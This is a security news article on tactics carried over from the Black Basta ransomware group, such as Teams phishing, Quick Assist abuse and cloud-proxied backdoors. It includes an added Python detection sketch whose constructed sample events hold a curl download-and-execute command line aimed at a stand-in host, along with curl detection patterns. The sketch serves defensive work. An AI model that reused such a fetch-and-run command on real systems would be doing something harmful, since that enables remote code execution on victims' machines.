NEWS Escape from the Courtroom, Phishing in Teams, and $600K in Cash — All That Remains of Black Basta

ExcalibuR


Former members have vanished from the radar, but their tactics are resurfacing on the cyber frontlines.


Despite the public downfall of the Black Basta group after internal chat leaks in February 2025, its former members continue using familiar attack methods — and are even actively evolving them. As highlighted in a report by ReliaQuest, traditional techniques like mass email campaigns and phishing via Microsoft Teams are now enhanced with Python scripts and covert delivery of malicious payloads through cloud services.


A key innovation in recent campaigns is the use of cURL requests to download and execute malicious scripts on victims' computers. These attacks have been observed in the financial, insurance, and construction sectors, where attackers impersonated tech support by exploiting compromised domains and fake accounts on “onmicrosoft[.]com” domains. Roughly half of all Teams phishing attacks from February to May 2025 originated from these domains — 42% of them from already compromised assets.


According to ReliaQuest, the attackers use the access they have gained to initiate remote sessions through Quick Assist and AnyDesk, after which a Python script is deployed to establish a persistent command-and-control channel to the infected host. In some cases, victims are shown fake Windows login windows to steal credentials.
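The two paragraphs above describe a chain with a recognisable telemetry footprint: an external Teams message from a *.onmicrosoft.com sender, then Quick Assist or AnyDesk starting on the same host, then cURL fetching a script and a script host running it. The following correlation sketch is an added example, not code from ReliaQuest or from the page; the event records are constructed, and the field names (ts, host, type, sender, external, image, cmdline) are assumed rather than any real Microsoft 365 or EDR schema.

```python
"""Correlate Teams phishing -> remote-assist tool -> curl download -> script
execution on one host. Added example; sample events and field names are
constructed assumptions, not a real log schema."""
import re
from datetime import datetime, timedelta

# Constructed telemetry: one external Teams message plus process-creation
# events from the same workstation, and one benign curl on another host.
SAMPLE_EVENTS = [
    {"ts": "2025-04-02T09:12:00", "host": "WS-114", "type": "teams_message",
     "sender": "helpdesk@contoso-support.onmicrosoft.com", "external": True},
    {"ts": "2025-04-02T09:20:00", "host": "WS-114", "type": "process",
     "image": "quickassist.exe", "cmdline": "quickassist.exe"},
    {"ts": "2025-04-02T09:24:00", "host": "WS-114", "type": "process",
     "image": "curl.exe",
     "cmdline": "curl.exe -s -o C:\\Users\\Public\\update.py https://cloud.example/update.py"},
    {"ts": "2025-04-02T09:24:30", "host": "WS-114", "type": "process",
     "image": "python.exe", "cmdline": "python.exe C:\\Users\\Public\\update.py"},
    {"ts": "2025-04-02T11:00:00", "host": "WS-220", "type": "process",
     "image": "curl.exe", "cmdline": "curl.exe https://example.org/ -I"},
]

REMOTE_TOOLS = {"quickassist.exe", "anydesk.exe"}
SCRIPT_HOSTS = {"python.exe", "pythonw.exe", "python3.exe", "powershell.exe"}
# curl writing its response to a file: -o/--output (-O is matched via re.I)
DOWNLOAD_RE = re.compile(r"\bcurl(\.exe)?\b.*?(-o|--output)\b", re.I)
URL_RE = re.compile(r"https?://\S+", re.I)


def is_default_tenant_domain(address: str) -> bool:
    """True when the sender lives in a tenant's default *.onmicrosoft.com domain."""
    domain = address.rsplit("@", 1)[-1].lower()
    return domain == "onmicrosoft.com" or domain.endswith(".onmicrosoft.com")


def is_curl_download(cmdline: str) -> bool:
    """curl invoked with a URL and an output-file flag, i.e. fetch-to-disk."""
    return bool(DOWNLOAD_RE.search(cmdline)) and bool(URL_RE.search(cmdline))


def correlate(events, window_minutes=30):
    """Return one alert per host where the full chain occurs within the window
    after an external Teams message from an onmicrosoft.com sender."""
    by_host = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        by_host.setdefault(ev["host"], []).append(ev)

    alerts = []
    for host, evs in by_host.items():
        for start in evs:
            if start["type"] != "teams_message" or not start.get("external"):
                continue
            if not is_default_tenant_domain(start["sender"]):
                continue
            t0 = datetime.fromisoformat(start["ts"])
            t1 = t0 + timedelta(minutes=window_minutes)
            later = [e for e in evs if e["type"] == "process"
                     and t0 <= datetime.fromisoformat(e["ts"]) <= t1]
            # Stages are checked in order so a script host only counts after
            # a curl download has already been seen on the same host.
            stages = {"remote_tool": False, "curl_download": False, "script_exec": False}
            for e in later:
                img = e["image"].lower()
                if img in REMOTE_TOOLS:
                    stages["remote_tool"] = True
                elif img == "curl.exe" and is_curl_download(e["cmdline"]):
                    stages["curl_download"] = True
                elif img in SCRIPT_HOSTS and stages["curl_download"]:
                    stages["script_exec"] = True
            if all(stages.values()):
                alerts.append({"host": host, "sender": start["sender"],
                               "first_seen": start["ts"]})
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print("ALERT", alert)
```

The sender-domain check on its own is noisy, since many legitimate small tenants never configure a vanity domain; the value is in requiring the later stages on the same host inside a short window. The 30-minute window and the set of script hosts are tunable assumptions.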


One of the most striking developments in the ongoing activity of former Black Basta members was the courtroom escape of alleged leader Oleg Nefyodov in Armenia. Local media reported that he was arrested on June 21, 2024, at Interpol’s request and was to be held for 72 hours while the court reviewed a prosecutor’s motion for temporary detention. However, on the day of the hearing, Nefyodov’s lawyer secured a 15-minute break, during which the defendant was granted "a walk" — and used the opportunity to escape.


Despite the disappearance of the Black Basta leak site, its techniques are experiencing a revival. There is reason to believe that some former members have joined the CACTUS group, as chat logs mention a transfer of $500,000–600,000 to its address. However, CACTUS has not posted new data on its leak site since March 2025, prompting speculation that the group may have either gone underground or disbanded.


A potential new refuge for former Black Basta operatives is the BlackLock group, which is believed to be affiliated with a new cartel called DragonForce. This alliance has surfaced in several major attack investigations in recent months.


Attack infrastructure is also evolving: enhanced Java backdoors, once used by Black Basta to steal credentials, are now leveraging cloud services like Google Drive and OneDrive for command proxying — a method that helps bypass traditional detection tools. In recent samples, proxy configuration fields were left blank, suggesting an intentional shift to exclusive use of cloud provider infrastructure.


New variants of this malware can transfer files, deploy SOCKS5 proxies, extract browser passwords, launch remote Java classes in memory, and even display fake login prompts — making them powerful tools for persistence and further exploitation.


These techniques, actively used by former Black Basta members, are now spreading to other groups. For instance, BlackSuit has adopted similar social engineering tactics, including Teams phishing and Quick Assist abuse, possibly indicating a transfer of tactics or members.


The reports also highlight several other malware strains in use. These include the Python-based Anubis backdoor, a Java backdoor, and a Rust-based utility believed to function as a loader for an SSH client. Of particular note is the QDoor tunneling backdoor — previously linked to BlackSuit — recently spotted in 3AM-style attacks, as described by Sophos.


Meanwhile, other cybercrime groups are conducting parallel campaigns. Scattered Spider is targeting MSP companies using Evilginx-based phishing pages to bypass MFA. Qilin (aka Agenda/Phantom Mantis) is exploiting Fortinet FortiGate vulnerabilities, and Play is leveraging CVE-2024-57727 in SimpleHelp software to breach U.S. organizations.


The internal conflict within the VanHelsing group recently led to the leak of its entire source code — including TOR keys, admin panel, blog database, and chat system. Additionally, Interlock has begun deploying a new JavaScript backdoor, NodeSnake, targeting UK government and education sectors.


As emphasized by Quorum Cyber, the use of RATs (Remote Access Trojans) remains the primary method for gaining and maintaining access to compromised systems. These tools allow attackers to control the machine, monitor user activity, deploy more malware, and exfiltrate data — making them indispensable in the modern cyberattack arsenal.